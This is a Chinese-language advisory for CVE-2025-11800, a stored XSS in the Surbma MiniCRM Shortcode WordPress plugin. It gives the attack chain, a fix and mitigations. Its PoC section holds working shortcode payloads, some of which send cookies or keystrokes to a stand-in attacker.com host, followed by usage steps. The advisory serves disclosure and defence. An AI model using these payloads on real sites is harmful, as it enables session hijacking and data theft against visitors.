CVE-2025-11800 WordPress MiniCRM Shortcode插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11800

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Surbma | MiniCRM Shortcode plugin for WordPress

漏洞概述

CVE-2025-11800是WordPress插件Surbma | MiniCRM Shortcode中的一个存储型跨站脚本(XSS)漏洞。该插件用于在WordPress页面中嵌入MiniCRM短代码，漏洞源于对用户输入的'id'短代码属性缺乏充分的输入清理和输出转义。攻击者只需拥有WordPress contributor级别或更高权限，即可通过在页面中插入恶意构造的minicrm短代码来注入任意JavaScript脚本。由于是存储型XSS，恶意脚本会被永久保存在数据库中，当其他用户访问包含该短代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全后果。该漏洞影响版本至2.0(含)，CVSS评分6.4，属于中危漏洞。

技术细节

该漏洞存在于插件的短代码处理逻辑中。攻击者利用WordPress的minicrm短代码功能，通过'id'属性注入恶意JavaScript代码。由于插件在处理该属性时未进行适当的输入清理（sanitization）和输出转义（output escaping），导致用户输入的原始内容被直接嵌入到HTML页面中。攻击者可以通过以下方式利用：1) 在页面编辑时插入恶意短代码如[minicrm id='"><script>alert(document.cookie)</script>']；2) 恶意代码随页面内容保存到数据库；3) 当其他用户访问该页面时，浏览器会执行注入的脚本。由于WordPress的 contributor角色具有创建和编辑文章的权限，因此攻击门槛相对较低。攻击成功后可窃取用户会话cookie、劫持管理员操作、进行蠕虫传播等。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress contributor级别或更高权限账户

STEP 2

步骤2

攻击者创建或编辑文章/页面，插入包含恶意payload的minicrm短代码

STEP 3

步骤3

插件将未经过滤的用户输入（'id'属性值）直接存储到数据库

STEP 4

步骤4

受害者访问包含恶意短代码的页面

STEP 5

步骤5

插件输出页面时，未转义的恶意脚本被嵌入HTML并发送给受害者浏览器

STEP 6

步骤6

受害者浏览器执行注入的JavaScript代码，导致会话劫持、敏感信息窃取等后果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11800 PoC - Stored XSS via minicrm shortcode 'id' attribute -->
<!--
Description: Authenticated contributors+ can inject arbitrary JavaScript
through the 'id' attribute of the [minicrm] shortcode
-->

<!-- PoC 1: Basic XSS injection -->
[minicrm id='"><script>alert('XSS')</script>']

<!-- PoC 2: Cookie stealing payload -->
[minicrm id='"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>']

<!-- PoC 3: Session hijacking with img tag -->
[minicrm id='"><img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">']

<!-- PoC 4: DOM-based keylogger -->
[minicrm id='"><script>document.addEventListener('keypress',function(e){new Image().src='https://attacker.com/klog?k='+e.key})</script>']

<!--
Usage:
1. Login to WordPress with contributor+ account
2. Create/Edit a post or page
3. Insert one of the above shortcodes in the content
4. Publish or update the post
5. When any user visits the page, the XSS payload will execute
-->

<!-- Recommended fix: Add proper escaping in plugin code -->
<!-- Example fix for surbma-minicrm-shortcode.php line ~34:
Replace: echo '<div id="' . $id . '" class="surbma-minicrm">';
With: echo '<div id="' . esc_attr($id) . '" class="surbma-minicrm">';
-->

影响范围

Surbma | MiniCRM Shortcode plugin <= 2.0

防御指南

临时缓解措施

临时缓解措施：1) 限制或禁用WordPress contributor及以上角色的文章发布权限；2) 禁用非管理员使用短代码功能；3) 部署Content Security Policy (CSP)响应头限制脚本执行；4) 使用WordPress安全插件（如Wordfence）进行实时防护和恶意代码检测；5) 审查并删除已发布内容中的可疑短代码。建议尽快升级到插件最新版本以获得完整修复。